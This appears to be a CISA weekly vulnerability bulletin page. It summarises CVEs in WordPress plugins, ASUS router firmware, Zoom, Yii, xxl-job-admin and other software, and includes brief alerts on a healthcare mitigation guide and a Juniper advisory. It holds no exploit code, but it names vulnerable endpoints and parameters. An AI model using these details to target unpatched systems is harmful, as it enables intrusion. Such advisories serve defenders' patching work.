wordpress — wordpress Unauth. Stored Cross-Site Scripting (XSS) vulnerability in Acurax Under Construction / Maintenance Mode from Acurax plugin <= 2.6 versions. 2023-11-16 not yet calculated CVE-2023-39926
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in Tomas | Docs | FAQ | Premium Support WordPress Tooltips. This issue affects WordPress Tooltips: from n/a through 8.2.5. 2023-11-18 not yet calculated CVE-2023-25985
wordpress — wordpress
 
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Wishfulthemes Raise Mag, Wishfulthemes Wishful Blog themes allows Reflected XSS.This issue affects Raise Mag: from n/a through 1.0.7; Wishful Blog: from n/a through 2.0.1. 2023-11-16 not yet calculated CVE-2023-28621
 
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in Yoast Yoast Local Premium.This issue affects Yoast Local Premium: from n/a through 14.8. 2023-11-18 not yet calculated CVE-2023-28780
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in Arshid Easy Hide Login. This issue affects Easy Hide Login: from n/a through 1.0.8. 2023-11-18 not yet calculated CVE-2023-31075
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in Tradebooster Video XML Sitemap Generator. This issue affects Video XML Sitemap Generator: from n/a through 1.0.0. 2023-11-18 not yet calculated CVE-2023-31089
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in WPDeveloper Essential Addons for Elementor Pro.This issue affects Essential Addons for Elementor Pro: from n/a through 5.4.8. 2023-11-18 not yet calculated CVE-2023-32245
wordpress — wordpress
 
Unauth. Stored Cross-Site Scripting (XSS) vulnerability in MingoCommerce WooCommerce Product Enquiry plugin <= 2.3.4 versions. 2023-11-16 not yet calculated CVE-2023-32796
wordpress — wordpress
 
Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Dazzlersoft Team Members Showcase plugin <= 1.3.4 versions. 2023-11-16 not yet calculated CVE-2023-32957
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in Patreon Patreon WordPress. This issue affects Patreon WordPress: from n/a through 1.8.6. 2023-11-18 not yet calculated CVE-2023-41129
wordpress — wordpress
 
The AppPresser plugin for WordPress is vulnerable to unauthorized password resets in versions up to, and including 4.2.5. This is due to the plugin generating too weak a reset code, and the code used to reset the password has no attempt or time limit. 2023-11-18 not yet calculated CVE-2023-4214

 

wordpress — wordpress
 
The Namaste! LMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘course_id’ parameter in versions up to, and including, 2.6.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. 2023-11-15 not yet calculated CVE-2023-4602

 

wordpress — wordpress
 
The Elementor Addon Elements plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.12.7. This is due to missing or incorrect nonce validation on the eae_save_elements function. This makes it possible for unauthenticated attackers to enable/disable elementor addon elements via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. 2023-11-15 not yet calculated CVE-2023-4689

 

wordpress — wordpress
 
The Elementor Addon Elements plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.12.7. This is due to missing or incorrect nonce validation on the eae_save_config function. This makes it possible for unauthenticated attackers to change configuration settings for the plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. 2023-11-15 not yet calculated CVE-2023-4690

 

wordpress — wordpress
 
The Elementor Addon Elements plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 1.12.7 via the ajax_eae_post_data function. This can allow unauthenticated attackers to extract sensitive data including post/page ids and titles including those of with pending/draft/future/private status. 2023-11-15 not yet calculated CVE-2023-4723

 

wordpress — wordpress
 
Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Scott Paterson Easy PayPal Shopping Cart plugin <= 1.1.10 versions. 2023-11-16 not yet calculated CVE-2023-47239
wordpress — wordpress
 
Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Codeboxr CBX Map for Google Map & OpenStreetMap plugin <= 1.1.11 versions. 2023-11-16 not yet calculated CVE-2023-47240
wordpress — wordpress
 
Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Marco Milesi ANAC XML Bandi di Gara plugin <= 7.5 versions. 2023-11-16 not yet calculated CVE-2023-47242
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in CodeMShop ???? ????? – MSHOP MY SITE. This issue affects ???? ????? – MSHOP MY SITE: from n/a through 1.1.6. 2023-11-18 not yet calculated CVE-2023-47243
wordpress — wordpress
 
Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Marco Milesi ANAC XML Viewer plugin <= 1.7 versions. 2023-11-16 not yet calculated CVE-2023-47245
wordpress — wordpress
 
Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Averta Master Slider Pro plugin <= 3.6.5 versions. 2023-11-16 not yet calculated CVE-2023-47508
wordpress — wordpress
 
Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in ioannup Edit WooCommerce Templates plugin <= 1.1.1 versions. 2023-11-16 not yet calculated CVE-2023-47509
wordpress — wordpress
 
Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in SO WP Pinyin Slugs plugin <= 2.3.0 versions. 2023-11-16 not yet calculated CVE-2023-47511
wordpress — wordpress
 
Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Gravity Master Product Enquiry for WooCommerce plugin <= 3.0 versions. 2023-11-16 not yet calculated CVE-2023-47512
wordpress — wordpress
 
Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in lawrenceowen, gcubero, acunnningham, fmahmood Star CloudPRNT for WooCommerce plugin <= 2.0.3 versions. 2023-11-16 not yet calculated CVE-2023-47514
wordpress — wordpress
 
Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in SendPress Newsletters plugin <= 1.23.11.6 versions. 2023-11-14 not yet calculated CVE-2023-47517
wordpress — wordpress
 
Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Matthew Muro Restrict Categories plugin <= 2.6.4 versions. 2023-11-14 not yet calculated CVE-2023-47518
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in WC Product Table WooCommerce Product Table Lite. This issue affects WooCommerce Product Table Lite: from n/a through 2.6.2. 2023-11-18 not yet calculated CVE-2023-47519
wordpress — wordpress
 
Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Michael Uno (miunosoft) Responsive Column Widgets plugin <= 1.2.7 versions. 2023-11-14 not yet calculated CVE-2023-47520
wordpress — wordpress
 
Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Photo Feed plugin <= 2.2.1 versions. 2023-11-14 not yet calculated CVE-2023-47522
wordpress — wordpress
 
Unauth. Reflected Cross-Site Scripting (XSS) vulnerability (requires PHP 8.x) in CodeBard CodeBard’s Patron Button and Widgets for Patreon plugin <= 2.1.9 versions. 2023-11-14 not yet calculated CVE-2023-47524
wordpress — wordpress
 
Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Sajjad Hossain Sagor WP Edit Username plugin <= 1.0.5 versions. 2023-11-14 not yet calculated CVE-2023-47528
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in DroitThemes Droit Dark Mode. This issue affects Droit Dark Mode: from n/a through 1.1.2. 2023-11-18 not yet calculated CVE-2023-47531
wordpress — wordpress
 
Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Themeum WP Crowdfunding plugin <= 2.1.6 versions. 2023-11-14 not yet calculated CVE-2023-47532
wordpress — wordpress
 
Unauth. Stored Cross-Site Scripting (XSS) vulnerability in Atarim Visual Website Collaboration, Feedback & Project Management – Atarim plugin <= 3.12 versions. 2023-11-14 not yet calculated CVE-2023-47544
wordpress — wordpress
 
Auth. (editor+) Stored Cross-Site Scripting (XSS) vulnerability in Fatcat Apps Forms for Mailchimp by Optin Cat – Grow Your MailChimp List plugin <= 2.5.4 versions. 2023-11-14 not yet calculated CVE-2023-47545
wordpress — wordpress
 
Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Walter Pinem OneClick Chat to Order plugin <= 1.0.4.2 versions. 2023-11-14 not yet calculated CVE-2023-47546
wordpress — wordpress
 
Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in WPFactory Products, Order & Customers Export for WooCommerce plugin <= 2.0.7 versions. 2023-11-14 not yet calculated CVE-2023-47547
wordpress — wordpress
 
Unauth. Reflected Cross-Site Scripting (XSS) vulnerability on 302 response page in spider-themes EazyDocs plugin <= 2.3.3 versions. 2023-11-14 not yet calculated CVE-2023-47549
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in RedNao Donations Made Easy – Smart Donations. This issue affects Donations Made Easy – Smart Donations: from n/a through 4.0.12. 2023-11-18 not yet calculated CVE-2023-47551
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in Labib Ahmed Image Hover Effects – WordPress Plugin. This issue affects Image Hover Effects – WordPress Plugin: from n/a through 5.5. 2023-11-18 not yet calculated CVE-2023-47552
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in User Local Inc UserHeat Plugin. This issue affects UserHeat Plugin: from n/a through 1.1.6. 2023-11-18 not yet calculated CVE-2023-47553
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in James Mehorter Device Theme Switcher. This issue affects Device Theme Switcher: from n/a through 3.0.2. 2023-11-18 not yet calculated CVE-2023-47556
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in profilegrid ProfileGrid – User Profiles, Memberships, Groups and Communities. This issue affects ProfileGrid – User Profiles, Memberships, Groups and Communities: from n/a through 5.6.6. 2023-11-18 not yet calculated CVE-2023-47644
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in PriceListo Best Restaurant Menu by PriceListo. This issue affects Best Restaurant Menu by PriceListo: from n/a through 1.3.1. 2023-11-18 not yet calculated CVE-2023-47649
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in Peter Sterling Add Local Avatar. This issue affects Add Local Avatar: from n/a through 12.1. 2023-11-18 not yet calculated CVE-2023-47650
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in Robert Macchi WP Links Page. This issue affects WP Links Page: from n/a through 4.9.4. 2023-11-18 not yet calculated CVE-2023-47651
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in Marco Milesi ANAC XML Bandi di Gara. This issue affects ANAC XML Bandi di Gara: from n/a through 7.5. 2023-11-18 not yet calculated CVE-2023-47655
wordpress — wordpress
 
Auth. (ShopManager+) Stored Cross-Site Scripting (XSS) vulnerability in GrandPlugins Direct Checkout – Quick View – Buy Now For WooCommerce plugin <= 1.5.8 versions. 2023-11-14 not yet calculated CVE-2023-47657
wordpress — wordpress
 
Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Lavacode Lava Directory Manager plugin <= 1.1.34 versions. 2023-11-14 not yet calculated CVE-2023-47659
wordpress — wordpress
 
Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in WP Wham Product Visibility by Country for WooCommerce plugin <= 1.4.9 versions. 2023-11-14 not yet calculated CVE-2023-47660
wordpress — wordpress
 
Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in GoldBroker.Com Live Gold Price & Silver Price Charts Widgets plugin <= 2.4 versions. 2023-11-14 not yet calculated CVE-2023-47662
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in edward_plainview Plainview Protect Passwords. This issue affects Plainview Protect Passwords: from n/a through 1.4. 2023-11-18 not yet calculated CVE-2023-47664
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in Code Snippets Pro Code Snippets. This issue affects Code Snippets: from n/a through 3.5.0. 2023-11-18 not yet calculated CVE-2023-47666
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in Mammothology WP Full Stripe Free. This issue affects WP Full Stripe Free: from n/a through 1.6.1. 2023-11-18 not yet calculated CVE-2023-47667
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in Jongmyoung Kim Korea SNS. This issue affects Korea SNS: from n/a through 1.6.3. 2023-11-18 not yet calculated CVE-2023-47670
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in Gopi Ramasamy Vertical scroll recent. This issue affects Vertical scroll recent post: from n/a through 14.0. 2023-11-18 not yet calculated CVE-2023-47671
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in Swashata WP Category Post List Widget. This issue affects WP Category Post List Widget: from n/a through 2.0.3. 2023-11-18 not yet calculated CVE-2023-47672
wordpress — wordpress
 
Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Stefano Ottolenghi Post Pay Counter plugin <= 2.789 versions. 2023-11-14 not yet calculated CVE-2023-47673
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in Lukman Nakib Preloader Matrix. This issue affects Preloader Matrix: from n/a through 2.0.1. 2023-11-18 not yet calculated CVE-2023-47685
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in Kiboko Labs Arigato Autoresponder and Newsletter plugin <= 2.7.2.2 versions. 2023-11-16 not yet calculated CVE-2023-47686
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in VJInfotech Woo Custom and Sequential Order Number plugin <= 2.6.0 versions. 2023-11-16 not yet calculated CVE-2023-47687
wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in Alexufo Youtube SpeedLoad plugin <= 0.6.3 versions. 2023-11-16 not yet calculated CVE-2023-47688
wordpress — wordpress
 
The Shareaholic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via ‘shareaholic’ shortcode in versions up to, and including, 9.7.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-11-15 not yet calculated CVE-2023-4889
 
wordpress — wordpress
 
The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 1.12.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. 2023-11-15 not yet calculated CVE-2023-5381

 

wordpress — wordpress
 
The YOP Poll plugin for WordPress is vulnerable to a race condition in all versions up to, and including, 6.5.26. This is due to improper restrictions on the add() function. This makes it possible for unauthenticated attackers to place multiple votes on a single poll even when the poll is set to one vote per person. 2023-11-14 not yet calculated CVE-2023-6109
 
wordpress — wordpress
 
The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient blacklisting on the ‘forminator_allowed_mime_types’ function in versions up to, and including, 1.27.0. This makes it possible for authenticated attackers with administrator-level capabilities or above to upload arbitrary files on the affected site’s server, but due to the htaccess configuration, remote code cannot be executed. 2023-11-15 not yet calculated CVE-2023-6133

 

wordpress — wordpress
 
The Paid Memberships Pro plugin for WordPress is vulnerable to arbitrary file uploads to insufficient file type validation in the ‘pmpro_paypalexpress_session_vars_for_user_fields’ function in versions up to, and including, 2.12.3. This makes it possible for authenticated attackers with subscriber privileges or above, to upload arbitrary files on the affected site’s server which may make remote code execution possible. This can be exploited if 2Checkout (deprecated since version 2.6) or PayPal Express is set as the payment method and a custom user field is added that is only visible at profile, and not visible at checkout according to its settings. 2023-11-18 not yet calculated CVE-2023-6187

 

xxl-job-admin — xxl-job-admin
 
xxl-job-admin 2.4.0 is vulnerable to Insecure Permissions via /xxl-job-admin/joblog/clearLog and /xxl-job-admin/joblog/logDetailCat. 2023-11-15 not yet calculated CVE-2023-48087
xxl-job-admin — xxl-job-admin
 
xxl-job-admin 2.4.0 is vulnerable to Cross Site Scripting (XSS) via /xxl-job-admin/joblog/logDetailPage. 2023-11-15 not yet calculated CVE-2023-48088
xxl-job-admin — xxl-job-admin
 
xxl-job-admin 2.4.0 is vulnerable to Remote Code Execution (RCE) via /xxl-job-admin/jobcode/save. 2023-11-15 not yet calculated CVE-2023-48089
yii — yii Yii is an open source PHP web framework. yiisoft/yii before version 1.1.29 are vulnerable to Remote Code Execution (RCE) if the application calls `unserialize()` on arbitrary user input. An attacker may leverage this vulnerability to compromise the host system. A fix has been developed for the 1.1.29 release. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-14 not yet calculated CVE-2023-47130

 

yt-dlp — yt-dlp yt-dlp is a youtube-dl fork with additional features and fixes. The Generic Extractor in yt-dlp is vulnerable to an attacker setting an arbitrary proxy for a request to an arbitrary url, allowing the attacker to MITM the request made from yt-dlp’s HTTP session. This could lead to cookie exfiltration in some cases. Version 2023.11.14 removed the ability to smuggle `http_headers` to the Generic extractor, as well as other extractors that use the same pattern. Users are advised to upgrade. Users unable to upgrade should disable the Ggneric extractor (or only pass trusted sites with trusted content) and ake caution when using `–no-check-certificate`. 2023-11-15 not yet calculated CVE-2023-46121

 

zoom — in-meeting_chat Cryptographic issues with In-Meeting Chat for some Zoom clients may allow a privileged user to conduct an information disclosure via network access. 2023-11-14 not yet calculated CVE-2023-39199
zoom — multiple_products Uncontrolled resource consumption in Zoom Team Chat for Zoom Desktop Client for Windows and Zoom VDI Client may allow an unauthenticated user to conduct a disclosure of information via network access. 2023-11-14 not yet calculated CVE-2023-39203
zoom — rooms Link following in Zoom Rooms for macOS before version 5.16.0 may allow an authenticated user to conduct an escalation of privilege via local access. 2023-11-15 not yet calculated CVE-2023-43590
zoom — rooms Improper privilege management in Zoom Rooms for macOS before version 5.16.0 may allow an authenticated user to conduct an escalation of privilege via local access. 2023-11-15 not yet calculated CVE-2023-43591
zoom — rooms_client Untrusted search path in Zoom Rooms Client for Windows and Zoom VDI Client may allow a privileged user to conduct a denial of service via local access. 2023-11-14 not yet calculated CVE-2023-39202
zoom — team_chat Improper conditions check in Zoom Team Chat for Zoom clients may allow an authenticated user to conduct a denial of service via network access. 2023-11-14 not yet calculated CVE-2023-39205
zoom — zoom Buffer overflow in some Zoom clients may allow an unauthenticated user to conduct a denial of service via network access. 2023-11-14 not yet calculated CVE-2023-39204
zoom — zoom Buffer overflow in some Zoom clients may allow an unauthenticated user to conduct a denial of service via network access. 2023-11-14 not yet calculated CVE-2023-39206
zoom — zoom Improper authorization in some Zoom clients may allow an authorized user to conduct an escalation of privilege via network access. 2023-11-15 not yet calculated CVE-2023-43582
zoom — zoom Insufficient control flow management in some Zoom clients may allow an authenticated user to conduct an information disclosure via network access. 2023-11-15 not yet calculated CVE-2023-43588
zulip — zulip
 
Zulip is an open-source team collaboration tool. It was discovered by the Zulip development team that active users who had previously been subscribed to a stream incorrectly continued being able to use the Zulip API to access metadata for that stream. As a result, users who had been removed from a stream, but still had an account in the organization, could still view metadata for that stream (including the stream name, description, settings, and an email address used to send emails into the stream via the incoming email integration). This potentially allowed users to see changes to a stream’s metadata after they had lost access to the stream. This vulnerability has been addressed in version 7.5 and all users are advised to upgrade. There are no known workarounds for this issue. 2023-11-16 not yet calculated CVE-2023-47642
 
 adobe — acrobat_reader
 
Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44361

Back to top

Categories
alerts

CISA Releases The Mitigation Guide: Healthcare and Public Health (HPH) Sector

Today, CISA released the Mitigation Guide: Healthcare and Public Health (HPH) Sector as a supplemental companion to the HPH Cyber Risk Summary, published July 19, 2023. This guide provides defensive mitigation strategy recommendations and best practices to combat pervasive cyber threats affecting this critical infrastructure sector. It also identifies known vulnerabilities for organizations to assess their networks and minimize risks before intrusions occur. 

For more information and resources, HPH entities are encouraged to visit CISA’s Healthcare and Public Health Cybersecurity Toolkit and Healthcare and Public Health Sector webpages.

Categories
alerts

Juniper Releases Security Advisory for Juniper Secure Analytics

Juniper released a security advisory to address multiple vulnerabilities affecting Juniper Secure Analytics. A cyber threat actor could exploit one of these vulnerabilities to take control of an affected system.

CISA encourages users and administrators to review the Juniper advisory JSA74298 and apply the necessary updates.

Categories
alerts

Vulnerability Summary for the Week of November 6, 2023

 

High Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
1e — platform The 1E-Exchange-URLResponseTime instruction that is part of the Network product pack available on the 1E Exchange does not properly validate the URL parameter, which allows for a specially crafted input to perform arbitrary code execution with SYSTEM permissions. To remediate this issue download the updated Network product pack from the 1E Exchange and update the 1E-Exchange-URLResponseTime instruction to v20.1 by uploading it through the 1E Platform instruction upload UI 2023-11-06 7.2 CVE-2023-45161
MISC
MISC
1e — platform The 1E-Exchange-CommandLinePing instruction that is part of the Network product pack available on the 1E Exchange does not properly validate the input parameter, which allows for a specially crafted input to perform arbitrary code execution with SYSTEM permissions. To remediate this issue download the updated Network product pack from the 1E Exchange and update the 1E-Exchange-CommandLinePing instruction to v18.1 by uploading it through the 1E Platform instruction upload UI 2023-11-06 7.2 CVE-2023-45163
MISC
MISC
1e — platform The 1E-Exchange-DisplayMessageinstruction that is part of the End-User Interaction product pack available on the 1E Exchange does not properly validate the Caption or Message parameters, which allows for a specially crafted input to perform arbitrary code execution with SYSTEM permissions. To remediate this issue DELETE the instruction “Show dialogue with caption %Caption% and message %Message%” from the list of instructions in the Settings UI, and replace it with the new instruction 1E-Exchange-ShowNotification instruction available in the updated End-User Interaction product pack. The new instruction should show as “Show %Type% type notification with header %Header% and message %Message%” with a version of 7.1 or above. 2023-11-06 7.2 CVE-2023-5964
MISC
MISC
7-zip — 7-zip 7-Zip through 22.01 on Linux allows an integer underflow and code execution via a crafted 7Z archive. 2023-11-03 7.8 CVE-2023-31102
MISC
MISC
MISC
advanced_export_products_orders_cron_csv_excel_project — advanced_export_products_orders_cron_csv_excel Insecure permissions in Smart Soft advancedexport before v4.4.7 allow unauthenticated attackers to arbitrarily download user information from the ps_customer table. 2023-11-07 7.5 CVE-2023-43984
arm — valhall_gpu_kernel_driver A local non-privileged user can make improper GPU memory processing operations. If the operations are carefully prepared, then they could be used to gain access to already freed memory. 2023-11-07 7.8 CVE-2023-3889
arm — valhall_gpu_kernel_driver A local non-privileged user can make improper GPU memory processing operations to gain access to already freed memory. 2023-11-07 7.8 CVE-2023-4295
asus — rt-ax55_firmware ASUS RT-AX55’s authentication-related function has a vulnerability of insufficient filtering of special characters within its token-generated module. An authenticated remote attacker can exploit this vulnerability to perform a Command Injection attack to execute arbitrary commands, disrupt the system, or terminate services. 2023-11-03 8.8 CVE-2023-41345
MISC
asus — rt-ax55_firmware ASUS RT-AX55’s authentication-related function has a vulnerability of insufficient filtering of special characters within its token-refresh module. An authenticated remote attacker can exploit this vulnerability to perform a Command Injection attack to execute arbitrary commands, disrupt the system or terminate services. 2023-11-03 8.8 CVE-2023-41346
MISC
asus — rt-ax55_firmware ASUS RT-AX55’s authentication-related function has a vulnerability of insufficient filtering of special characters within its check token module. An authenticated remote attacker can exploit this vulnerability to perform a Command Injection attack to execute arbitrary commands, disrupt the system or terminate services. 2023-11-03 8.8 CVE-2023-41347
MISC
asus — rt-ax55_firmware ASUS RT-AX55’s authentication-related function has a vulnerability of insufficient filtering of special characters within its code-authentication module. An authenticated remote attacker can exploit this vulnerability to perform a Command Injection attack to execute arbitrary commands, disrupt the system or terminate services. 2023-11-03 8.8 CVE-2023-41348
MISC
asus — rt-ax57_firmware An issue in ASUS RT-AX57 v.3.0.0.4_386_52041 allows a remote attacker to execute arbitrary code via a crafted request to the lan_ifname field in the sub_ln 2C318 function. 2023-11-09 9.8 CVE-2023-47005
asus — rt-ax57_firmware An issue in ASUS RT-AX57 v.3.0.0.4_386_52041 allows a remote attacker to execute arbitrary code via a crafted request to the lan_ipaddr field in the sub_6FC74 function. 2023-11-09 9.8 CVE-2023-47006
asus — rt-ax57_firmware An issue in ASUS RT-AX57 v.3.0.0.4_386_52041 allows a remote attacker to execute arbitrary code via a crafted request to the lan_ifname field in the sub_391B8 function. 2023-11-09 9.8 CVE-2023-47007
asus — rt-ax57_firmware An issue in ASUS RT-AX57 v.3.0.0.4_386_52041 allows a remote attacker to execute arbitrary code via a crafted request to the ifname field in the sub_4CCE4 function. 2023-11-09 9.8 CVE-2023-47008
best_courier_management_system — best_courier_management_system An issue in Best Courier Management System v.1.0 allows a remote attacker to execute arbitrary code and escalate privileges via a crafted script to the userID parameter. 2023-11-03 9.8 CVE-2023-46980
MISC
MISC
bestpractical — request_tracker Best Practical Request Tracker (RT) before 4.4.7 and 5.x before 5.0.5 allows Information Disclosure via fake or spoofed RT email headers in an email message or a mail-gateway REST API call. 2023-11-03 7.5 CVE-2023-41259
MISC
CONFIRM
CONFIRM
bestpractical — request_tracker Best Practical Request Tracker (RT) before 4.4.7 and 5.x before 5.0.5 allows Information Exposure in responses to mail-gateway REST API calls. 2023-11-03 7.5 CVE-2023-41260
MISC
CONFIRM
CONFIRM
bestpractical — request_tracker Best Practical Request Tracker (RT) 5 before 5.0.5 allows Information Disclosure via a transaction search in the transaction query builder. 2023-11-03 7.5 CVE-2023-45024
MISC
CONFIRM
bleachbit — bleachbit BleachBit cleans files to free disk space and to maintain privacy. BleachBit for Windows up to version 4.4.2 is vulnerable to a DLL Hijacking vulnerability. By placing a DLL in the Folder c:DLLs, an attacker can run arbitrary code on every execution of BleachBit for Windows. This issue has been patched in version 4.5.0. 2023-11-08 7.3 CVE-2023-47113
boltwire — boltwire An issue in BoltWire v.6.03 allows a remote attacker to obtain sensitive information via a crafted payload to the view and change admin password function. 2023-11-07 9.1 CVE-2023-46501
 
botan_project — botan bcrypt password hashing in Botan before 2.1.0 does not correctly handle passwords with a length between 57 and 72 characters, which makes it easier for attackers to determine the cleartext password. 2023-11-03 7.5 CVE-2017-7252
CONFIRM
MISC
clickbar — dot-diver Dot diver is a lightweight, powerful, and dependency-free TypeScript utility library that provides types and functions to work with object paths in dot notation. In versions prior to 1.0.2 there is a Prototype Pollution vulnerability in the `setByPath` function which can leads to remote code execution (RCE). This issue has been addressed in commit `98daf567` which has been included in release 1.0.2. Users are advised to upgrade. There are no known workarounds to this vulnerability. 2023-11-06 9.8 CVE-2023-45827
MISC
MISC
couchbase — couchbase_server Couchbase Server 7.1.4 before 7.1.5 and 7.2.0 before 7.2.1 allows Directory Traversal. 2023-11-08 7.5 CVE-2023-36667
 
djangoproject — django In Django 3.2 before 3.2.21, 4.1 before 4.1.11, and 4.2 before 4.2.5, django.utils.encoding.uri_to_iri() is subject to a potential DoS (denial of service) attack via certain inputs with a very large number of Unicode characters. 2023-11-03 7.5 CVE-2023-41164
CONFIRM
MISC
 
djangoproject — django In Django 3.2 before 3.2.22, 4.1 before 4.1.12, and 4.2 before 4.2.6, the django.utils.text.Truncator chars() and words() methods (when used with html=True) are subject to a potential DoS (denial of service) attack via certain inputs with very long, potentially malformed HTML text. The chars() and words() methods are used to implement the truncatechars_html and truncatewords_html template filters, which are thus also vulnerable. NOTE: this issue exists because of an incomplete fix for CVE-2019-14232. 2023-11-03 7.5 CVE-2023-43665
CONFIRM
MISC
 
ec-cube — ec-cube EC-CUBE 3 series (3.0.0 to 3.0.18-p6) and 4 series (4.0.0 to 4.0.6-p3, 4.1.0 to 4.1.2-p2, and 4.2.0 to 4.2.2) contain an arbitrary code execution vulnerability due to improper settings of the template engine Twig included in the product. As a result, arbitrary code may be executed on the server where the product is running by a user with an administrative privilege. 2023-11-07 7.2 CVE-2023-46845

 

eclipse — glassfish In Eclipse Glassfish 5 or 6, running with old versions of JDK (lower than 6u211, or < 7u201, or < 8u191), allows remote attackers to load malicious code on the server via access to insecure ORB listeners. 2023-11-03 9.8 CVE-2023-5763
MISC
MISC
eclipse — parsson In Eclipse Parsson before versions 1.1.4 and 1.0.5, Parsing JSON from untrusted sources can lead malicious actors to exploit the fact that the built-in support for parsing numbers with large scale in Java has a number of edge cases where the input text of a number can lead to much larger processing time than one would expect. To mitigate the risk, parsson put in place a size limit for the numbers as well as their scale. 2023-11-03 7.5 CVE-2023-4043
MISC
MISC
espressif — esptool An issue discovered in esptool 4.6.2 allows attackers to view sensitive information via weak cryptographic algorithm. 2023-11-09 7.5 CVE-2023-46894
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Alex Raven WP Report Post plugin <= 2.1.2 versions. 2023-11-09 8.8 CVE-2023-34171
exiv2 — exiv2 Exiv2 is a C++ library and a command-line utility to read, write, delete and modify Exif, IPTC, XMP and ICC image metadata. An out-of-bounds write was found in Exiv2 version v0.28.0. The vulnerable function, `BmffImage::brotliUncompress`, is new in v0.28.0, so earlier versions of Exiv2 are _not_ affected. The out-of-bounds write is triggered when Exiv2 is used to read the metadata of a crafted image file. An attacker could potentially exploit the vulnerability to gain code execution, if they can trick the victim into running Exiv2 on a crafted image file. This bug is fixed in version v0.28.1. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-06 8.8 CVE-2023-44398
MISC
MISC
felixwelberg — sis_handball Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Felix Welberg SIS Handball allows SQL Injection.This issue affects SIS Handball: from n/a through 1.0.45. 2023-11-06 9.8 CVE-2023-33924
MISC
froxlor — froxlor Improper Input Validation in GitHub repository froxlor/froxlor prior to 2.1.0. 2023-11-10 8.8 CVE-2023-6069
 
